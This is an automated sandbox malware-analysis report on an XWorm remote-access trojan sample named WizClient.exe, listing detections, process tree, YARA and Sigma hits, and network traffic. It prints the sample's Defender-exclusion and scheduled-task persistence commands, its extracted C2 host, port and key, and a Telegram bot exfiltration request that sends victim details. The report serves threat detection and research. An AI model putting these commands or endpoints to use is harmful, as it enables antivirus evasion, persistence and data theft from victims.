Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WizClient.exe

Overview

General Information

Sample name:WizClient.exe
Analysis ID:1636114
MD5:4df0e2c3c8b75a58f9cab6e4a6125bc9
SHA1:c53c2d60f1fdf2eb0fafaccf6ca93d566b5c9d98
SHA256:c8a29e32b2977f1e5e757178313c319e04d031a2165ed2ddad6ed8e2a1ebd61f
Tags:exeuser-BastianHein
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • WizClient.exe (PID: 7012 cmdline: "C:\Users\user\Desktop\WizClient.exe" MD5: 4DF0E2C3C8B75A58F9CAB6E4A6125BC9)
    • powershell.exe (PID: 6920 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8420 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WizClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WizClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 9112 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WizClient" /tr "C:\Users\user\AppData\Local\WizClient.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 9120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • WizClient.exe (PID: 5156 cmdline: C:\Users\user\AppData\Local\WizClient.exe MD5: 4DF0E2C3C8B75A58F9CAB6E4A6125BC9)
  • WizClient.exe (PID: 8300 cmdline: "C:\Users\user\AppData\Local\WizClient.exe" MD5: 4DF0E2C3C8B75A58F9CAB6E4A6125BC9)
  • WizClient.exe (PID: 1364 cmdline: "C:\Users\user\AppData\Local\WizClient.exe" MD5: 4DF0E2C3C8B75A58F9CAB6E4A6125BC9)
  • WizClient.exe (PID: 3728 cmdline: C:\Users\user\AppData\Local\WizClient.exe MD5: 4DF0E2C3C8B75A58F9CAB6E4A6125BC9)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["amazon-astrology.gl.at.ply.gg"], "Port": 54918, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
WizClient.exeJoeSecurity_XWormYara detected XWormJoe Security
    WizClient.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
    • 0xc6bf:$str01: $VB$Local_Port
    • 0xc6e3:$str02: $VB$Local_Host
    • 0xab2d:$str03: get_Jpeg
    • 0xb0f1:$str04: get_ServicePack
    • 0xdc15:$str05: Select * from AntivirusProduct
    • 0xe337:$str06: PCRestart
    • 0xe34b:$str07: shutdown.exe /f /r /t 0
    • 0xe3eb:$str08: StopReport
    • 0xe3c1:$str09: StopDDos
    • 0xe431:$str10: sendPlugin
    • 0xe5a1:$str12: -ExecutionPolicy Bypass -File "
    • 0xee5b:$str13: Content-length: 5235
    WizClient.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x10247:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x102e4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x103f9:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xed76:$cnc4: POST / HTTP/1.1

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\WizClient.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Local\WizClient.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
      • 0xc6bf:$str01: $VB$Local_Port
      • 0xc6e3:$str02: $VB$Local_Host
      • 0xab2d:$str03: get_Jpeg
      • 0xb0f1:$str04: get_ServicePack
      • 0xdc15:$str05: Select * from AntivirusProduct
      • 0xe337:$str06: PCRestart
      • 0xe34b:$str07: shutdown.exe /f /r /t 0
      • 0xe3eb:$str08: StopReport
      • 0xe3c1:$str09: StopDDos
      • 0xe431:$str10: sendPlugin
      • 0xe5a1:$str12: -ExecutionPolicy Bypass -File "
      • 0xee5b:$str13: Content-length: 5235
      C:\Users\user\AppData\Local\WizClient.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x10247:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x102e4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x103f9:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xed76:$cnc4: POST / HTTP/1.1

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000003.00000000.1277877176.0000000000232000.00000002.00000001.01000000.00000004.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000003.00000000.1277877176.0000000000232000.00000002.00000001.01000000.00000004.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x10047:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x100e4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x101f9:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0xeb76:$cnc4: POST / HTTP/1.1
        Process Memory Space: WizClient.exe PID: 7012JoeSecurity_XWormYara detected XWormJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.0.WizClient.exe.230000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            3.0.WizClient.exe.230000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
            • 0xc6bf:$str01: $VB$Local_Port
            • 0xc6e3:$str02: $VB$Local_Host
            • 0xab2d:$str03: get_Jpeg
            • 0xb0f1:$str04: get_ServicePack
            • 0xdc15:$str05: Select * from AntivirusProduct
            • 0xe337:$str06: PCRestart
            • 0xe34b:$str07: shutdown.exe /f /r /t 0
            • 0xe3eb:$str08: StopReport
            • 0xe3c1:$str09: StopDDos
            • 0xe431:$str10: sendPlugin
            • 0xe5a1:$str12: -ExecutionPolicy Bypass -File "
            • 0xee5b:$str13: Content-length: 5235
            3.0.WizClient.exe.230000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x10247:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x102e4:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x103f9:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0xed76:$cnc4: POST / HTTP/1.1

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WizClient.exe", ParentImage: C:\Users\user\Desktop\WizClient.exe, ParentProcessId: 7012, ParentProcessName: WizClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', ProcessId: 6920, ProcessName: powershell.exe
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WizClient.exe", ParentImage: C:\Users\user\Desktop\WizClient.exe, ParentProcessId: 7012, ParentProcessName: WizClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', ProcessId: 6920, ProcessName: powershell.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\WizClient.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\WizClient.exe, ProcessId: 7012, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WizClient
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WizClient.exe", ParentImage: C:\Users\user\Desktop\WizClient.exe, ParentProcessId: 7012, ParentProcessName: WizClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', ProcessId: 6920, ProcessName: powershell.exe
            Sigma detected: Startup Folder File Write
            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\WizClient.exe, ProcessId: 7012, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WizClient.lnk
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WizClient" /tr "C:\Users\user\AppData\Local\WizClient.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WizClient" /tr "C:\Users\user\AppData\Local\WizClient.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\WizClient.exe", ParentImage: C:\Users\user\Desktop\WizClient.exe, ParentProcessId: 7012, ParentProcessName: WizClient.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WizClient" /tr "C:\Users\user\AppData\Local\WizClient.exe", ProcessId: 9112, ProcessName: schtasks.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WizClient.exe", ParentImage: C:\Users\user\Desktop\WizClient.exe, ParentProcessId: 7012, ParentProcessName: WizClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WizClient.exe', ProcessId: 6920, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-12T12:21:02.903256+010028559241Malware Command and Control Activity Detected192.168.2.549728147.185.221.2654918TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-12T12:20:01.105440+010018100071Potentially Bad Traffic192.168.2.549714149.154.167.220443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: WizClient.exeAvira: detected
            Antivirus detection for URL or domain
            Source: amazon-astrology.gl.at.ply.ggAvira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\WizClient.exeAvira: detection malicious, Label: TR/Spy.Gen
            Found malware configuration
            Source: WizClient.exeMalware Configuration Extractor: Xworm {"C2 url": ["amazon-astrology.gl.at.ply.gg"], "Port": 54918, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\WizClient.exeReversingLabs: Detection: 71%
            Multi AV Scanner detection for submitted file
            Source: WizClient.exeVirustotal: Detection: 69%Perma Link
            Source: WizClient.exeReversingLabs: Detection: 71%
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Sample uses string decryption to hide its real strings
            Source: WizClient.exeString decryptor: amazon-astrology.gl.at.ply.gg
            Source: WizClient.exeString decryptor: 54918
            Source: WizClient.exeString decryptor: <123456789>
            Source: WizClient.exeString decryptor: <Xwormmm>
            Source: WizClient.exeString decryptor: USB.exe
            Source: WizClient.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 108.181.22.211:443 -> 192.168.2.5:49719 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 108.181.22.211:443 -> 192.168.2.5:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 108.181.22.211:443 -> 192.168.2.5:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 91.134.10.168:443 -> 192.168.2.5:49725 version: TLS 1.2
            Source: WizClient.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49728 -> 147.185.221.26:54918
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49714 -> 149.154.167.220:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: amazon-astrology.gl.at.ply.gg
            Connects to many ports of the same IP (likely port scanning)
            Source: global trafficTCP traffic: 147.185.221.26 ports 54918,1,4,5,8,9
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficTCP traffic: 192.168.2.5:49717 -> 147.185.221.26:54918
            Source: global trafficHTTP traffic detected: GET /bot7389617975:AAFNBkW6gfsAxHeXuCSCpKK2LqIKysVo-aw/sendMessage?chat_id=6968388729&text=%E2%98%A0%20%5BWizWorm%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A1E4B5E3450B776F282A4%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 147.185.221.26 147.185.221.26
            Source: Joe Sandbox ViewIP Address: 108.181.22.211 108.181.22.211
            Source: Joe Sandbox ViewIP Address: 91.134.10.168 91.134.10.168
            Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /bot7389617975:AAFNBkW6gfsAxHeXuCSCpKK2LqIKysVo-aw/sendMessage?chat_id=6968388729&text=%E2%98%A0%20%5BWizWorm%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A1E4B5E3450B776F282A4%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Dwrj41N/Image.png HTTP/1.1Host: i.ibb.coConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficDNS traffic detected: DNS query: amazon-astrology.gl.at.ply.gg
            Source: global trafficDNS traffic detected: DNS query: i.ibb.co
            Source: powershell.exe, 00000008.00000002.1543347899.0000016119F05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
            Source: WizClient.exe, 00000003.00000002.2589619208.000000001B297000.00000004.00000020.00020000.00000000.sdmp, WizClient.exe, 00000003.00000002.2557559588.00000000006B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e6.i.lencr.org/0
            Source: WizClient.exe, 00000003.00000002.2589619208.000000001B297000.00000004.00000020.00020000.00000000.sdmp, WizClient.exe, 00000003.00000002.2557559588.00000000006B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e6.o.lencr.org0
            Source: WizClient.exe, 00000003.00000002.2561891365.00000000024D5000.00000004.00000800.00020000.00000000.sdmp, WizClient.exe, 00000003.00000002.2561891365.0000000002566000.00000004.00000800.00020000.00000000.sdmp, WizClient.exe, 00000003.00000002.2561891365.00000000024FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i.ibb.co
            Source: powershell.exe, 00000005.00000002.1379923372.000001F96D949000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1528597758.0000016111768000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1717800931.0000020C90076000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000000D.00000002.1581919442.0000020C80229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000005.00000002.1362115925.000001F95DAF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1430483427.0000016101919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1581919442.0000020C80229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: WizClient.exe, 00000003.00000002.2561891365.0000000002431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1362115925.000001F95D8D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1430483427.00000161016F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1581919442.0000020C80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000005.00000002.1362115925.000001F95DAF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1430483427.0000016101919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1581919442.0000020C80229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 0000000D.00000002.1581919442.0000020C80229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: WizClient.exe, 00000003.00000002.2589619208.000000001B297000.00000004.00000020.00020000.00000000.sdmp, WizClient.exe, 00000003.00000002.2557559588.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, WizClient.exe, 00000003.00000002.2589619208.000000001B329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: WizClient.exe, 00000003.00000002.2589619208.000000001B297000.00000004.00000020.00020000.00000000.sdmp, WizClient.exe, 00000003.00000002.2557559588.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, WizClient.exe, 00000003.00000002.2589619208.000000001B329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: powershell.exe, 00000005.00000002.1362115925.000001F95D8D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1430483427.00000161016F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1581919442.0000020C80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: WizClient.exe, WizClient.exe.3.drString found in binary or memory: https://api.telegram.org/bot
            Source: powershell.exe, 0000000D.00000002.1717800931.0000020C90076000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000D.00000002.1717800931.0000020C90076000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000D.00000002.1717800931.0000020C90076000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000000D.00000002.1581919442.0000020C80229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
